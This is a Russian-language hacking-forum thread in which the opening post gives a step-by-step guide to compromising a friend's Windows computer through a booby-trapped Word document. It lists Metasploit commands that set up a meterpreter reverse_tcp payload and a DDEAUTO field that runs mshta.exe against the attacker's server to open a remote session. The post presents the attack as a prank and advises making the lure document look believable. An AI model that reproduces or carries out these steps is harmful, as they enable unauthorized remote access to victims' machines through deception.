Загрузка...

Hacking your friend through MS Office

Thread in Social engineering created by Ilusdsf Feb 18, 2019. 514 views

  1. Ilusdsf
    Ilusdsf Topic starter Feb 18, 2019 134 Oct 22, 2018
    Любите своих друзей и не заставляйте их скучать


    Теория

    DDE exploit используется для динамического обмена данных. Эта уязвимость позволяет передавать данные между приложениями MS Office без взаимодействия между пользователями. Этот метод используется для получения доступа к системе. Можно легко отправить файл другу с данными его "переписки" и он с большим любопытством будет открывать этот файл)

    Установка
    Необходимые составляющие для проведения атаки:

    1. Устройство с Kali Linux.
    2. Устройство с Windows.
    3. Microsoft Office (Word).
    Все описанные действия проводились в Kali Linux. Для начала нам необходимо установить компоненты и добавить их в базу Metasploit. Сначала скачаем эксплоит с помощью команды:

    wget https://raw.githubusercontent.com/r...dules/exploits/windows/script/dde_delivery.rb

    [IMG]
    Далее добавим эту утилиту в папку с эксплоитами Metasploit:

    mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

    [IMG]
    После этого можно переходить в msfconsole. Запускаем и производим обновления всех наших путей:

    msfconsole
    reload_all

    [IMG]
    После этого можно переходить к генерации нашей полезной нагрузки. Для этого необходимо пошагово выполнять такие команды:

    use exploit/windows/dde_delivery

    [IMG]
    Далее нам необходимо установить свой сервис чтобы принимать соединение, для этого нужно указать команду со своим IP адресом:

    set SRVHOST 192.168.177.141
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.177.141
    set LPORT 6708 exploit
    exploit

    [IMG]
    Подготавливаем документ MS Office
    После этого получаем ссылку, которую нужно вмонтировать в документ MS Office. Для этого переходим в раздел "Вставить"->"Быстрые элементы"->"Поле" (Можно использовать быструю комбинацию CTRL + F9).

    {DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.1.6:8080/wi9o8uanVgkjv”}

    [IMG]
    [IMG]
    После открытия документа откроется сессия. После открытия будут два всплывающих окна. Но они без каких либо запретов, просто уведомления о наличии сторонних связей с другими приложениями.

    [IMG]
    Готовая ссылка
    [IMG]
    Получаем сессию
    Заключение
    Вот таким способом можно получить доступ к компьютеру. Дальше смотрите в сторону пост эксплуатации. Там есть очень много чего интересного. Любите своих друзей и не заставляйте их скучать. Можно пошутить вот таким простым, но эффективным способом. Также формулы можно использовать и в других программах MS Office. Для более правдоподобного вида нужно наполнять ********* тематическим содержанием.
     
    This article was useful for you?
    You can thank the author of the topic by transferring funds to your balance
    Thank the author
  2. Aleksandr1_inactive146861
    Aleksandr1_inactive146861 Mar 24, 2019 Ник со смыслом 70 Aug 5, 2017
    пробовал кто?
     
  3. SaintMurder_inactive629492
    Скрытая реклама своей телеги:what2:
     
Top
Loading...